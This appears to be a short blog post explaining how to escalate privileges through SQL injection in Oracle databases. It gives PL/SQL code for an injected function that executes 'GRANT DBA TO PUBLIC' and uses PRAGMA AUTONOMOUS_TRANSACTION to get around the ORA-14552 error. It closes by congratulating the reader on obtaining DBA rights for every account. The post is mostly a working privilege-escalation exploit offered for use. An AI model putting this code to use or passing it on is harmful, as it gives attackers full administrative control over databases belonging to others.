There seem to be some limitations to Injecting and running hackers supplied functions. It appears we can perform only SELECT queries. If we try to execute DDL or DML statements or anything that require COMMIT or ROLLBACK, then attempting to do so will churn out the error
ORA-14552: cannot perform a DDL, commit or rollback inside a query or DML
Example:
Create or replace function GET_DBA return varchar2 AUTHID CURRENT_USER
Is
BEGIN
EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’;
END
GRANT EXECUTE ON GET_DBA TO PUBLIC;
It won’t work… And u got the upper described error L
Solution is here.
We can achieve this by the help of AUTONOMOUS_TRANSACTION in a procedure or function.
Create or replace function GET_DBA return varchar2 AUTHID CURRENT_USER
Is
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’;
END
Congrats! U got the DBA privileges for PUBLIC account.
Regards:
Manmohan Mishra
Analyst (AI)
Wipro Technologies
No comments:
Post a Comment